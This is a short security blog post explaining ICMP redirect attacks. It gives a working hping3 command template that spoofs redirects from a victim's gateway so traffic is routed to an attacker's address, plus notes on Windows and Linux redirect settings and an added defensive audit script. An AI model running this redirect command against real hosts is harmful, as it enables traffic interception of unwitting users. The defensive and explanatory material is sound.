SBM Labs

Cyber Security Collaboration Project

ICMP Redirect Attack
13 Jul 2016

To send an ICMP redirect packet, you can use the hping3 utility.

$ man hping3

hping3 - send (almost) arbitrary TCP/IP packets to network hosts

Example usage:

# hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS]

Note for Windows hosts.

By default, ICMP Redirect is enabled in Windows. It is controlled by the registry parameter EnableICMPRedirect, which is located under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters. Keep in mind that ICMP redirect packets can be blocked by Windows Firewall.

Note for Linux hosts.

Keep in mind these parameters:
- /proc/sys/net/ipv4/conf/all/accept_redirects (TRUE by default)
- /proc/sys/net/ipv4/conf/all/secure_redirects (TRUE by default)
- /proc/sys/net/ipv4/conf/all/shared_media (TRUE by default)
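
A defensive check for the Linux parameters above, as an added example that is not part of the original post. The kernel combines the `all` value with each interface's own value (OR for accept_redirects when forwarding is off, AND when it is on; OR for secure_redirects and shared_media), so the script reports the effective setting per interface. `REDIRECT_CONF_DIR` and the function names are hypothetical.

```shell
#!/bin/sh
# Added example: report the effective ICMP redirect settings per interface.
# REDIRECT_CONF_DIR is a hypothetical override for pointing the audit at a
# constructed directory tree; the default is the real kernel path.

# Read one 0/1 setting; treat a missing or unreadable file as 0.
rd() { cat "$1" 2>/dev/null || echo 0; }

# effective_accept_redirects CONF_DIR IFACE -> prints 1 (accepted) or 0
effective_accept_redirects() {
    conf=$1; ifc=$2
    all=$(rd "$conf/all/accept_redirects")
    own=$(rd "$conf/$ifc/accept_redirects")
    fwd=$(rd "$conf/$ifc/forwarding")
    if [ "$fwd" -ne 0 ]; then
        # Forwarding on (router): "all" AND the interface value must be set.
        if [ "$all" -ne 0 ] && [ "$own" -ne 0 ]; then echo 1; else echo 0; fi
    else
        # Forwarding off (host): "all" OR the interface value is enough,
        # so clearing only conf/all does not disable redirects.
        if [ "$all" -ne 0 ] || [ "$own" -ne 0 ]; then echo 1; else echo 0; fi
    fi
}

# effective_or CONF_DIR IFACE NAME -> secure_redirects and shared_media
# are enabled when either "all" or the interface value is set.
effective_or() {
    a=$(rd "$1/all/$3"); o=$(rd "$1/$2/$3")
    if [ "$a" -ne 0 ] || [ "$o" -ne 0 ]; then echo 1; else echo 0; fi
}

# audit_redirects CONF_DIR -> one line per interface
audit_redirects() {
    for d in "$1"/*/; do
        [ -d "$d" ] || continue
        ifc=$(basename "$d")
        case $ifc in all|default) continue ;; esac
        printf '%s accept_redirects=%s secure_redirects=%s shared_media=%s\n' \
            "$ifc" "$(effective_accept_redirects "$1" "$ifc")" \
            "$(effective_or "$1" "$ifc" secure_redirects)" \
            "$(effective_or "$1" "$ifc" shared_media)"
    done
}

audit_redirects "${REDIRECT_CONF_DIR:-/proc/sys/net/ipv4/conf}"
```

An interface that still reports accept_redirects=1 after conf/all has been set to 0 needs its own per-interface value cleared as well.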